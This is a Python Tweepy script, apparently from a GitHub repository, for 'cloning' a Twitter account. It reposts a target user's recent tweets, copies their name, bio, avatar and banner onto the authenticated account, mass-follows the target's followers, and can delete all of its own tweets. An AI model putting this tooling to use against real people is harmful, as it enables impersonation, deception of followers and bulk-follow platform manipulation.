            auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
            auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)
            # Return API access:
            self.api = tweepy.API(auth, wait_on_rate_limit=True,
                                  wait_on_rate_limit_notify=True, compression=True)
            # NOTE(review): the result is unused; this call only exercises the
            # consumer credentials against Twitter (it raises TweepError if
            # they are rejected) — confirm before removing.
            redirect_url = auth.get_authorization_url()
        except tweepy.TweepError:
            raise Exception('Error! Failed to get request token, please complete \
access file')

    def get_user(self, user):
        """Return the Tweepy User object for screen name *user*."""
        return self.api.get_user(user)

    def retrieve_tweets(self, user, count=20, include_rts=False):
        """Return up to *count* timeline tweets of *user* (retweets excluded by default)."""
        # The original wrapped this in try/except only to re-raise unchanged;
        # letting the exception propagate is equivalent and simpler.
        return self.api.user_timeline(screen_name=user, count=count,
                                      include_rts=include_rts)

    def post_tweet(self, tweet_text):
        """Post *tweet_text* from the authenticated account, reporting errors."""
        try:
            self.api.update_status(tweet_text)
            print("Successfully posted.")
        except tweepy.TweepError as e:
            print(e.reason)

    def clone_last_tweets(self, user_clone, quantity):
        """Repost the last *quantity* tweets of *user_clone*, oldest first."""
        tweets = self.retrieve_tweets(user_clone, quantity)[::-1]
        self.post_tweet("@{} is going to be cloned".format(user_clone))
        for tweet in tweets:
            # Print tweet:
            print(tweet.text)
            self.post_tweet(tweet.text)

    def delete_tweets(self):
        """Delete every tweet of the authenticated account, one by one."""
        # Fix: the original format string had no {} placeholder, so the
        # screen name was silently dropped from the message.
        print("Deleting all tweets from the account @{}".
              format(self.api.verify_credentials().screen_name))
        for status in tweepy.Cursor(self.api.user_timeline).items():
            try:
                self.api.destroy_status(status.id)
            except Exception as e:
                # Best effort: report and keep going (e.g. already-deleted ids).
                print(e)

    def print_tweets(self, tweets):
        """Print the text of each tweet in *tweets*, blank-line separated."""
        for i in tweets:
            print(i.text+"\n")

    def follow_users(self, user, quantity):
        """Follow up to *quantity* followers of *user*, page by page."""
        print("Following {} users from {}".format(quantity, user))
        for page in tweepy.Cursor(self.api.followers_ids, screen_name=user).pages():
            size = min(len(page), quantity)
            [self.api.create_friendship(id=page[i]) for i in range(size)]
            if len(page) > quantity:
                print("Followed {} users".format(quantity))
                return
            else:
                print("Followed {} users".format(len(page)))
                quantity -= len(page)

    def save_profile_photo(self, user):
        """Download *user*'s full-size avatar to ./profile_photo.jpg."""
        try:
            # Fix: the original sliced "_normal" out with hard-coded indices
            # ([:63] + [70:]), which corrupts any URL of a different length.
            image_url = user.profile_image_url.replace("_normal", "")
            img_data = requests.get(image_url).content
            with open('profile_photo.jpg', 'wb') as handler:
                handler.write(img_data)
        except Exception as e:
            raise e

    def save_profile_banner(self, user):
        """Download *user*'s banner image to ./banner_photo.jpg."""
        try:
            image_url = user.profile_banner_url
            img_data = requests.get(image_url).content
            with open('banner_photo.jpg', 'wb') as handler:
                handler.write(img_data)
        except Exception as e:
            raise e

    def update_profile(self, user):
        """Copy *user*'s name, bio, images and colors onto the authenticated account."""
        print("Updating your profile....")
        user = self.get_user(user)
        user_data = {
            "name": user.name,
            "location": user.location,
            "url": user.url,
            "description": user.description,
            "profile_link_color": user.profile_link_color,
        }
        self.save_profile_photo(user)
        self.save_profile_banner(user)
        self.api.update_profile_image("./profile_photo.jpg")
        self.api.update_profile_banner("./banner_photo.jpg")
        self.api.update_profile(**user_data)
        print("Successfully update your profile, using @{} profile".
              format(user.screen_name))
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("-p", "--print", help="print N tweets from the given profile",
                        type=int)
    parser.add_argument("-c", "--clone", help="clone N tweets from the given profile",
                        type=int)
    parser.add_argument("-d", "--delete", help="delete all tweets from the authenticated account",
                        action="store_true")
    parser.add_argument("-f", "--follow", help="follow N users from the given profile [slow]",
                        type=int)
    parser.add_argument("-up", help="update profile data using the profile cloning \
                        the given profile",
                        action="store_true")
    parser.add_argument("--user", help="provide user to clone from the command line",
                        action="store", type=str)
    # NOTE(review): --export is accepted but no action below consumes it; it is
    # kept for CLI compatibility. The original help text was the truncated "sav".
    parser.add_argument("--export", help="reserved: export tweets (not implemented)",
                        action="store", type=str)
    args = parser.parse_args()
    bot = Api()
    # Only prompt for a profile when some requested action actually needs one
    # (e.g. --delete alone works on the authenticated account and needs no user).
    needs_user = bool(args.print or args.clone or args.follow or args.up)
    user = args.user
    if needs_user and not user:
        user = input("Give some public profile please\n")
    if args.print:
        bot.print_tweets(bot.retrieve_tweets(user, args.print))
    if args.clone:
        bot.clone_last_tweets(user, args.clone)
    if args.follow:
        bot.follow_users(user, args.follow)
    if args.delete:
        bot.delete_tweets()
    if args.up:
        bot.update_profile(user)
| agusmdev/clone-twitter-account | clone_profile.py | clone_profile.py | py | 5,461 | python | en | code | 7 | github-code | 13 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.